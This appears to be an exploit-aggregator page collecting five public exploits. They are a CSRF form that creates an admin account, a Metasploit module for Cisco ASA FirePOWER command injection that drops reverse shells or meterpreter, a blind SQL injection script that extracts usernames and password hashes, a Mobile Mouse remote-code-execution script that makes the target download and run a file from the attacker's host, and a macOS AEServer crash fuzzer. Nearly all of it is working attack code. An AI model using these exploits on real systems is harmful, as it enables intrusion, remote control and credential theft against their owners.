Latest exploits :: CodePwn

<pre><code># Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) # Date: 05/09/2022 # Exploit Author: Amolo Hunters # Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) Summary: ================ The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges. Severity Level: ================ 5.4 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Affected Product: ================ Online Employee Leave Management System v1.0 Steps to Reproduce: ================ 1. Create an HTML file and paste the following code: <html> <title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title> <center> <h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1> by Amolo Hunters <form action="http://target.com/elms/admin/addemployee.php" method="POST"> <input type="hidden" name="empcode" value="1337" /> <input type="hidden" name="firstName" value="AmoloHT" /> <input type="hidden" name="lastName" value="PoC" /> <input type="hidden" name="email" value="amoloht@poc.com" /> <input type="hidden" name="password" value="hacker123" /> <input type="hidden" name="confirmpassword" value="hacker123" /> <input type="hidden" name="gender" value="Other" /> <input type="hidden" name="dob" value="3 June, 2022" /> <input type="hidden" name="department" value="Information Technology" /> <input type="hidden" name="country" value="Brazil" /> <input type="hidden" name="city" value="PoC" /> <input type="hidden" name="address" value="PoC" /> <input type="hidden" name="mobileno" value="0000000000" /> <input type="hidden" name="add" value="" /> <input type="submit" value="Submit request" /> </form> </center> </html> 2. Save the file and run it in the browser Note: you need to be logged in as an administrator </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Cisco ASA-X with FirePOWER Services Authenticated Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's ASDM web server and lands in the FirePower Services SFR module's Linux virtual machine as the root user. Access to the virtual machine allows the attacker to pivot to the inside network, and access the outside network. Also, the SFR virtual machine is running snort on the traffic flowing through the ASA, so the attacker should have access to this diverted traffic as well. This module requires ASDM credentials in order to traverse the ASDM interface. A similar attack can be performed via Cisco CLI (over SSH), although that isn't implemented here. Finally, it's worth noting that this attack bypasses the affects of the `lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be available but this attack makes it available). Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service, and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*. }, 'License' => MSF_LICENSE, 'Author' => [ 'jbaines-r7' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2022-20828' ], [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asasfr-cmd-inject-PE4GfdG' ], [ 'URL', 'https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/' ], [ 'URL', 'https://www.cisco.com/c/en/us/td/docs/security/asa/quick_start/sfr/firepower-qsg.html'] ], 'DisclosureDate' => '2022-06-22', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64,], 'Privileged' => true, 'Targets' => [ [ 'Shell Dropper', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => ARCH_X64, 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'wget' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('USERNAME', [true, 'Username to authenticate with', '']), OptString.new('PASSWORD', [true, 'Password to authenticate with', '']), ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/admin/exec/session+sfr+do+`id`'), 'headers' => { 'User-Agent' => 'ASDM/ Java/1', 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } }) return CheckCode::Unknown('The target did not respond to the check.') unless res return CheckCode::Safe('Authentication failed.') if res.code == 401 return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200 if res.body.include?('Invalid do command uid=0(root)') return CheckCode::Vulnerable("Successfully executed the 'id' command.") end CheckCode::Safe('The command injection does not appear to work.') end def execute_command(cmd, _opts = {}) # base64 encode the payload to work around bad characters and then uri encode # the whole thing before yeeting it at the server encoded_payload = Rex::Text.uri_encode("(base64 -d<<<#{Rex::Text.encode_base64(cmd)}|sh)&") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "/admin/exec/session+sfr+do+`#{encoded_payload}`"), 'headers' => { 'User-Agent' => 'ASDM/ Java/1', 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } }) if res fail_with(Failure::Unreachable, 'The target did not respond.') unless res fail_with(Failure::NoAccess, 'Could not log in. Verify credentials.') if res.code == 401 fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200 end if session_created? # technically speaking, bash can hold the connection open and skip all the res checks # also passing the res checks doesn't actually mean that the target was exploited so # check a session was created to get verification print_good('Session created!') else fail_with(Failure::NotVulnerable, 'The exploit was thrown but not session was created.') end end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end </code></pre>

<pre><code># Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection # Exploit Author: Joe Pollock # Date: September 03, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip # Tested on: Kali Linux, Apache, Mysql # CVE: CVE-2022-30004 (RESERVED) # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection. # This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection. # By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash. # Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency. # Ex: python3 omps.py 10.14.14.2 import sys, requests, urllib3 USERID=0 def main(): if len(sys.argv) != 2: print("(+) usage: %s <target>") % sys.argv[0] print('(+) eg: %s 192.168.121.103') % sys.argv[0] sys.exit(-1) ip = sys.argv[1] print("(+) Retrieving username and hash...") target = "http://%s/omps/classes/Users.php?f=save_user" % ip # Get username for p in range (1,30): injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p) for c in range(32, 126): files = {"username": (None, injection_string.replace("[CHAR]", str(c)))} #print(injection_string.replace("[CHAR]", str(c))) r = requests.post(target, files=files) if (r.elapsed.total_seconds() > 2): extracted_char = chr(c) sys.stdout.write(extracted_char) sys.stdout.flush() sys.stdout.write("\t") # Get password hash for p in range (1,65): injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p) for c in range(32, 126): files = {"username": (None, injection_string.replace("[CHAR]", str(c)))} #print(injection_string.replace("[CHAR]", str(c))) r = requests.post(target, files=files) if (r.elapsed.total_seconds() > 2): extracted_char = chr(c) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution # Date: Aug 09, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269 68616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(5) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) sleep(0.8) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(50) s.close() </code></pre>

<pre><code>#!/usr/bin/env python # -*- coding: UTF-8 -*- # # naval.py # # Apple macOS Remote Events Remote Memory Corruption Vulnerability # # Jeremy Brown [jbrown3264/gmail] # # ===== # Intro # ===== # # [eppc] Hello from AEServer # # Remote Apple Events is a core service and remote system administration and automation # tool for Macs. It can be enabled via System Preferences -> Sharing and listens on # port tcp/3031 and may be used in enterprise environments for remote administration. # Sending malformed packets triggers a crash in the AEServer binary which may allow for # arbitrary code execution on the remote machine within the context of the _eppc user. # However, the crash is subtle as the service is automatically restarted and only a log # in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled. # # Although a controlled, reliable crash at an arbitrary location is difficult, it was # eventually achieved during testing with repeated characters in packets during sessions. # # Thread 0 crashed with X86 Thread State (64-bit): # rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370 # rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8 # r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0 # r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218 # rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260 # # While debugging it looks like the process is crashing when trying to release or # dereference memory that has been deallocated, likely a sign of a heap related bug # such as a use-after-free bug. # # This code serves as a toolkit to help debug and trigger crashes, but as mentioned # extensive testing was required to gain more precise control of rax/rcx. Also note # that authentication is not required to trigger crashes service locally or remotely. # # ======= # Details # ======= # # Much of the functionality depends on running this locally on the target box, such # as debugging with ReportCrash logs, but it can certainly trigger remote crashes too # if you pass the --remote flag (disables local debugging stuff). # # $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets # .... # # $ head crashes.txt # 1 - (0x7e @ 1) -> 0x20 # [many more truncated] # # $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index # .... # # Then within 10 seconds, start the debugger on the local target.. GOGOGO # # $ sudo lldb -o "attach --name AEServer" -o c # .... # # (lldb) c # Process 50050 resuming # Process 50050 stopped # * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8) # frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31 # # And now you can explore the crash # # One can also check to see AEServer receving packets: # > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer # # === # Fix # === # - Addressed in Monterey 12.3 # # CVE-2022-22630 # import os import sys import argparse import datetime import time import psutil import shutil import signal import socket import random import re REPORT_DIR = '/Library/Logs/DiagnosticReports' LOG_DIR = 'logs' PORT = 3031 # eppc CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt' REPORT_CRASH = True SLEEP_TIME = 10 MAX_BYTE = 255 # 0xff # # original packets # PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01' PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00' PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00' PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61' # # crashing packets # PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01' PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy class Naval(object): def __init__(self, args): self.host = args.host self.fuzz = args.fuzz self.replay = args.replay self.remote = args.remote self.reprofile = args.reprofile self.original = args.original self.sleep = args.sleep self.pkt1 = None self.pkt2 = None # original self.pkt3 = None self.pkt4 = None self.pkt5 = None self.pkt_pick = 0 self.pkt_num = None self.byte = None self.index = None self.logs = [] def run(self): if(self.remote): REPORT_CRASH = False else: REPORT_CRASH = True if(REPORT_CRASH): # # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist # if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())): print("ReportCrash isn't running, make sure it's enabled first\n") return -1 if(os.path.isdir(REPORT_DIR)): try: logs = os.listdir(REPORT_DIR) except Exception as error: print("failed to list %s: %s\n" % (REPORT_DIR, error)) return -1 else: print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR) return -1 if(self.original): # non-crashing self.pkt1 = PKT_1_ORIG self.pkt2 = PKT_2_ORIG self.pkt3 = PKT_3_ORIG self.pkt4 = PKT_4_ORIG self.pkt5 = PKT_5_ORIG else: # crashing self.pkt1 = PKT_1 self.pkt2 = PKT_2 if(self.replay): if(len(self.replay.split(':')) != 3): print("invalid replay format: %s" % self.replay) return -1 replay = self.replay.split(':') try: self.pkt_num = int(replay[0]) except Exception as error: print("packet number %s is invalid: %s", (pkt_num, error)) return -1 try: self.byte = int(replay[1], 16) except Exception as error: print("byte %s is invalid: %s", (byte, error)) return -1 try: self.index = int(replay[2]) except Exception as error: print("index %s is invalid: %s", (index, error)) return -1 if(self.pkt_num == 1): pkt = self.modifyPacket(self.pkt1, self.byte, self.index) if(pkt == None): return -1 elif(self.pkt_num == 2): pkt = self.modifyPacket(self.pkt2, self.byte, self.index) if(pkt == None): return -1 else: print("pkt number must be 1 or 2") return -1 print("replaying packets\n") self.showRepro(pkt) if(self.reprofile): if(self.repro(self.reprofile) < 0): print("failed") return -1 return 0 # # fuzz each packet one after another # if(self.fuzz): print("fuzzing sequentially packet 1\n") self.pkt_num = 1 if(self.fuzzPacketSeq(self.pkt1) < 0): print("failed") return -1 print("fuzzing sequentially packet 2\n") self.pkt_num = 2 if(self.fuzzPacketSeq(self.pkt2) < 0): print("failed") return -1 if(self.original): self.pkt_num = 3 if(self.fuzzPacketSeq(self.pkt3) < 0): print("failed") return -1 self.pkt_num = 4 if(self.fuzzPacketSeq(self.pkt4) < 0): print("failed") return -1 self.pkt_num = 5 if(self.fuzzPacketSeq(self.pkt5) < 0): print("failed") return -1 else: if(not self.replay): if(self.original): print("sending original packets for testing\n") else: print("sending packets to trigger crash\n") self.showRepro([]) sock = self.getSock() if(sock == None): return -1 try: sock.connect((self.host, PORT)) except Exception as error: print("connect() failed: %s\n" % error) return -1 if(self.sleep): time.sleep(SLEEP_TIME) try: sock.send(self.pkt1) sock.recv(256) except Exception as error: print("failed to send/recv packet 1: %s\n" % error) return -1 try: sock.send(self.pkt2) except Exception as error: print("failed to send packet 2: %s\n" % error) return -1 if(self.original): try: sock.send(PKT_3_ORIG) except Exception as error: print("failed to send packet 3: %s\n" % error) return -1 try: sock.send(PKT_4_ORIG) except Exception as error: print("failed to send packet 4: %s\n" % error) return -1 try: sock.send(PKT_5_ORIG) except Exception as error: print("failed to send packet 5: %s\n" % error) return -1 sock.close() if(REPORT_CRASH): self.checkReports() print("done\n") return 0 def getSock(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) except Exception as error: print("socket() failed: %s\n" % error) return None return sock def fuzzPacketSeq(self, packet): c = 0 i = 0 # # flip each byte in the packet sequentially from 0 ... 255 # while(i < len(packet)): while(c <= MAX_BYTE): pkt = bytearray(packet) self.index = i self.byte = c orig = pkt[self.index] pkt[self.index] = self.byte print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index]))) sock = self.getSock() if(sock == None): return -1 try: sock.connect((self.host, PORT)) except Exception as error: print("connect() failed: %s\n" % error) continue if(self.sendPacket(sock, pkt) < 0): print("sendPacket() failed\n") return -1 sock.close() self.showRepro(pkt) if(REPORT_CRASH): self.checkReports() c += 1 c = 0 i += 1 return 0 def createPacket(self, pkt_name): n = random.randint(8,4096) print("created \\x42 x %d for %s\n" % (n, pkt_name)) return str.encode('B' * n) def modifyPacket(self, pkt, byte, index): if((index < 0) or (index >= len(pkt))): print("index must be 0 - %d\n" % (len(pkt)-1)) return -1 pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:] return pkt def sendPacket(self, sock, pkt): try: if(self.pkt_pick == 1): sock.send(pkt) else: sock.send(self.pkt1) sock.recv(256) except socket.timeout: print("timed out") except Exception as error: print("send/recv failed for packet #1: %s\n" % error) try: if(self.pkt_pick == 2): sock.send(pkt) else: sock.send(self.pkt2) if(self.original): sock.recv(256) # not necessary for crashing packets 1 & 2 except Exception as error: print("send/recv failed for packet #2: %s\n" % error) if(self.original): try: if(self.pkt_pick == 3): sock.send(pkt) else: pick = random.randint(1,2) # # pick=1 means self.pkt3 doesn't change # if(pick == 2): self.pkt3 = self.createPacket('pkt3') sock.send(self.pkt3) sock.recv(256) except Exception as error: print("send/recv failed for packet #3: %s\n" % error) try: if(self.pkt_pick == 4): sock.send(pkt) else: pick = random.randint(1,2) if(pick == 2): self.pkt4 = self.createPacket('pkt4') sock.send(self.pkt4) sock.recv(256) except Exception as error: print("send/recv failed for packet #4: %s\n" % error) try: if(self.pkt_pick == 5): sock.send(pkt) else: pick = random.randint(1,2) if(pick == 2): self.pkt5 = self.createPacket('pkt5') sock.send(self.pkt5) sock.recv(256) except Exception as error: print("send/recv failed for packet #5: %s\n" % error) return 0 def repro(self, filename): print("reproing crash with %s\n" % os.path.basename(filename)) try: with open(filename, 'r') as file: data = file.readlines() except Exception as error: print("failed to read file %s: %s" % (filename, error)) return -1 try: self.pkt1 = bytes.fromhex(data[0].replace('\\x', '')) self.pkt2 = bytes.fromhex(data[1].replace('\\x', '')) if(self.original): self.pkt3 = bytes.fromhex(data[2].replace('\\x', '')) self.pkt4 = bytes.fromhex(data[3].replace('\\x', '')) self.pkt5 = bytes.fromhex(data[4].replace('\\x', '')) except Exception as error: print("failed to parse repro: %s" % error) return -1 sock = self.getSock() if(sock == None): return -1 try: sock.connect((self.host, PORT)) except Exception as error: print("connect() failed: %s\n" % error) return -1 if(self.sleep): time.sleep(SLEEP_TIME) try: sock.send(self.pkt1) sock.recv(256) except socket.timeout: print("timed out") except Exception as error: print("send/recv failed for packet #1: %s\n" % error) try: sock.send(self.pkt2) if(self.original): sock.recv(256) # not necessary for crashing packets 1 & 2 except Exception as error: print("send/recv failed for packet #2: %s\n" % error) if(self.original): try: sock.send(self.pkt3) sock.recv(256) except Exception as error: print("send/recv failed for packet #3: %s\n" % error) try: sock.send(self.pkt4) sock.recv(256) except Exception as error: print("send/recv failed for packet #4: %s\n" % error) try: sock.send(self.pkt5) sock.recv(256) except Exception as error: print("send/recv failed for packet #5: %s\n" % error) sock.close() self.showRepro([]) if(REPORT_CRASH): self.checkReports() print("done\n") return 0 def getHex(self, data): return ''.join(f'\\x{byte:02x}' for byte in data) def printHex(self, data): print(''.join(f'\\x{byte:02x}' for byte in data)) def showRepro(self, pkt): if(len(pkt) == len(self.pkt1)): self.printHex(pkt) else: self.printHex(self.pkt1) if(len(pkt) == len(self.pkt2)): self.printHex(pkt) else: self.printHex(self.pkt2) if(self.original): if(len(pkt) == len(self.pkt3)): self.printHex(pkt) else: self.printHex(self.pkt3) if(len(pkt) == len(self.pkt4)): self.printHex(pkt) else: self.printHex(self.pkt4) if(len(pkt) == len(self.pkt5)): self.printHex(pkt) else: self.printHex(self.pkt5) print() # # restore original packets # self.pkt3 = PKT_3_ORIG self.pkt4 = PKT_4_ORIG self.pkt5 = PKT_5_ORIG def checkReports(self): time.sleep(2) # make sure ReportCrash has time to do its thing try: logs_now = os.listdir(REPORT_DIR) except Exception as error: print("failed to open %s for reading: %s\n" % (REPORT_DIR, error)) return -1 if(len(logs_now) > len(self.logs)): logs_new = list(set(logs_now) - set(self.logs)) # # if we have new crash logs, grab the pc and correlate it with repro # for log in logs_new: if(log.startswith('AEServer') and log.endswith('.crash')): log_file = REPORT_DIR + os.sep + log try: with open(log_file, 'r') as file: data = file.read() except Exception as error: print("failed to read %s: %s\n" % (log, error)) return -1 pc = re.search('0x(.*)', data) if(pc != None): pc = '0x' + pc.group(1).lstrip('0') else: print("couldn't get pc from crash log\n") print("found crash @ pc=%s\n" % pc) # # create a crash log if we're fuzzing or replaying bytes at indices # if(self.fuzz): crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n' try: with open(CRASH_LOG, 'a') as file: file.write(crash_info) except Exception as error: print("failed to write %s: %s\n" % (crash_info, error)) return -1 if(not os.path.isdir(LOG_DIR)): try: os.mkdir(LOG_DIR) except Exception as error: print("failed to mkdir %s: %s\n" % (LOG_DIR, error)) log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt' # # move crash log file # try: shutil.move(log_file, log_name) except Exception as error: print("failed to move %s: %s\n" % (log_file, error)) return -1 ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips' ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt' # # check if there's an associated .ips # if(os.path.isfile(ips_file)): try: # shutil.move(ips_file, LOG_DIR) shutil.move(ips_file, ips_name) except Exception as error: print("failed to move %s: %s\n" % (ips_file, error)) return -1 # # write repro if random fuzzing (no byte/index to replay) # # note: possible bug somewhere preventing pkt 3-5 from saving the correct repro, # (eg. if mutated with B's), so for now we're just extra verbose with output when # mutating packets and stop if pc contains 424242 so we can debug from there # repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt' try: with open(repro_name, 'w') as file: file.write(self.getHex(self.pkt1)) file.write('\n') file.write(self.getHex(self.pkt2)) if(self.original): file.write('\n') file.write(self.getHex(self.pkt3)) file.write('\n') file.write(self.getHex(self.pkt4)) file.write('\n') file.write(self.getHex(self.pkt5)) except Exception as error: print("failed to write %s: %s\n" % (repro_name, error)) return -1 # # temporary to help triage crashing packets # if('424242' in pc): self.showRepro([]) sys.exit(0) # # reset logs after move # try: self.logs = os.listdir(REPORT_DIR) except Exception as error: print("failed to list %s: %s\n" % (REPORT_DIR, error)) return -1 return 0 def stop(signum, frame): print() sys.exit(0) def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("host", type=str, help="target listening on eppc port 3031") parser.add_argument("--fuzz", "--fuzz", default=False, action="store_true", help="sequentially exhaust bytes in each packet and display crashing PC as available") parser.add_argument("--remote", "--remote", default=False, action="store_true", help="target remote hosts and turn disable local debugging support") parser.add_argument("--replay", "--replay", type=str, help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3") parser.add_argument("--reprofile", "--reprofile", type=str, help="filename containing packet data on each line to replay (generated by random fuzzing)") parser.add_argument("--original", "--original", default=False, action="store_true", help="use the original non-crashing packets") parser.add_argument("--sleep", "--sleep", default=False, action="store_true", help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)") args = parser.parse_args() return args def main(): signal.signal(signal.SIGINT, stop) args = arg_parse() nr = Naval(args) result = nr.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main() </code></pre>